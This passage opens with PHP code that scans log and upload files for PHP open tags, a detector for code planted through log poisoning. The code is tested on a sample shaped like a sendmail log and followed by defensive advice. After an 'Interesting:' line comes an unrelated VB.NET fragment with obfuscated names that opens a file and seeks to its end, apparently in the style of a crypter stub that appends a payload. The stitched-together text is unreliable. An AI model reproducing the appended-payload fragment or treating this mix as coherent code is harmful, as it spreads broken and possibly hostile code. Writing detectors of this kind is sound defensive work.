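        $alternatives['short_echo'] = '<\?=';
        $alternatives['short']      = '<\?';
    }
    if ($aspTags) {
        $alternatives['asp_echo'] = '<%=';
        $alternatives['asp']      = '<%';
    }
    $groups = [];
    foreach ($alternatives as $kind => $pattern) {
        $groups[] = "(?<$kind>$pattern)";
    }
    $regex = '/' . implode('|', $groups) . '/i';

    if (preg_match_all($regex, $content, $matches, PREG_SET_ORDER | PREG_OFFSET_CAPTURE) === false) {
        throw new RuntimeException('regex failure, preg error ' . preg_last_error());
    }
    $hits = [];
    foreach ($matches as $set) {
        foreach (array_keys($alternatives) as $kind) {
            // Groups that did not participate are absent or carry an empty text.
            if (isset($set[$kind]) && $set[$kind][0] !== '') {
                $hits[] = ['kind' => $kind, 'offset' => $set[$kind][1], 'tag' => $set[$kind][0]];
                break;
            }
        }
    }
    return $hits;
}

/**
 * Scan one file that should contain no PHP at all and return its hits.
 */
function scan_non_php_file(string $path, bool $shortOpenTag, bool $aspTags): array
{
    $content = file_get_contents($path);
    if ($content === false) {
        throw new RuntimeException("cannot read $path");
    }
    return find_php_open_tags($content, $shortOpenTag, $aspTags);
}

// Constructed sample in the shape of a sendmail -X log. Line 2 has "<?php"
// glued to the next character: not a standard open tag, but a short tag.
// Line 3 is an ordinary XML declaration. Line 4 shows that a newline after
// "<?php" counts as whitespace.
$sample = "03785 <<< Subject: hello\n"
        . "06532 >>> MAIL From:<?phpCLI?>\n"
        . "<?xml version=\"1.0\"?>\n"
        . "<?php\necho 1;\n";

$withShort    = find_php_open_tags($sample, true, false);
$withoutShort = find_php_open_tags($sample, false, false);

// With short_open_tag=On (the default the article relies on) three tags are
// found, the XML declaration among them; with it Off only "<?php\n" remains.
if (array_column($withShort, 'kind') !== ['short', 'short', 'php']) {
    throw new RuntimeException('unexpected result with short_open_tag=On');
}
if (array_column($withoutShort, 'kind') !== ['php']) {
    throw new RuntimeException('unexpected result with short_open_tag=Off');
}
foreach ($withShort as $hit) {
    printf("offset %d: %-10s %s\n", $hit['offset'], $hit['kind'], json_encode($hit['tag']));
}
```

Run scan_non_php_file() over log and upload directories with the same short_open_tag and asp_tags values as the production php.ini; any hit in a file the web server could be persuaded to execute is worth an incident ticket, and the XML false positive is itself an argument for short_open_tag=Off. One caveat: the rules on this page are from 2011, and since PHP 5.4 the "<?=" tag is recognised regardless of short_open_tag, so on a current engine the short_echo case should be treated as always enabled.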
-
Interesting:

Const ady = "@targuOCna@"
Private Shared Function beleste(ByVal bas As String, ByVal sadsa As Long) As String()
Dim carnatzel As Long = Math.Ceiling(bas.Length / sadsa)
Dim piula(carnatzel - 1) As String
Dim MAMAIE As Long = 0
Dim pompeaza = IO.File.OpenWrite(dialog2.FileName)
Dim marishor = pompeaza.Seek(0, IO.SeekOrigin.[End])